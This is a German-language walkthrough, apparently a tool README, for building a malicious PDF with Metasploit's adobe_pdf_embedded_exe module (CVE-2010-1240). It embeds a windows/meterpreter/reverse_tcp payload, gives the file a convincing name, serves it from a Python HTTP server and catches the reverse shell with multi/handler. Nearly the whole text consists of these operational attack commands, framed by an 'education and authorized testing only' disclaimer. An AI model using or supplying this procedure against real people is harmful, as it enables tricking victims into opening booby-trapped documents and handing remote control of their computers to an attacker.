
Metasploit-basiertes Tool zum Einbetten von PDF-Backdoors, das CVE-2010-1240 ausnutzt, um Meterpreter-Payloads mittels Social Engineering für autorisierte Penetrationstests zu liefern.
⚠️ Nur für Bildungszwecke und autorisierte Sicherheitsforschung
Adobe Reader und Acrobat 9.x vor 9.3.3 sowie 8.x vor 8.2.3 unter Windows und Mac OS X schränken den Inhalt eines Textfeldes im Warnhinweis „Datei öffnen“ nicht ein, was es Angreifern erleichtert, Benutzer dazu zu verleiten, ein beliebiges lokales Programm auszuführen, das in einem PDF-Dokument angegeben wurde – demonstriert durch ein Textfeld, das behauptet, der Öffnen-Button erlaube das Lesen einer verschlüsselten Nachricht.

Starte zuerst msfconsole
msfconsole
Setze dann den Payload für das Einbetten in die PDF
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Setze die Option INFILENAME und gib den direkten Pfad zur Original-PDF-Datei an
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
Lege einen überzeugenderen Namen für die neu erstellte schadhafte PDF-Datei fest, indem du die Option FILENAME setzt
set FILENAME laporan.pdf
Suche und bette den Payload in die PDF-Datei ein
set payload windows/meterpreter/reverse_tcp
Setze die Option LHOST auf die IP des Angreifers
set LHOST 172.16.10.10
Öffne ein neues Terminal und navigiere zum Speicherort der schadhaften PDF-Datei
cd .msf4/local/
Erstelle einen temporären Server in Python
python -m http.server
Lade die schadhafte PDF-Datei auf dem Zielrechner herunter
http://172.16.10.10:8000/certificate.pdf
Bevor die schadhafte PDF-Datei auf dem Zielrechner ausgeführt wird, starte den Listener im vorherigen Terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
Sobald die schadhafte PDF-Datei auf dem Zielrechner ausgeführt wird, erhältst du eine Verbindung zum Zielrechner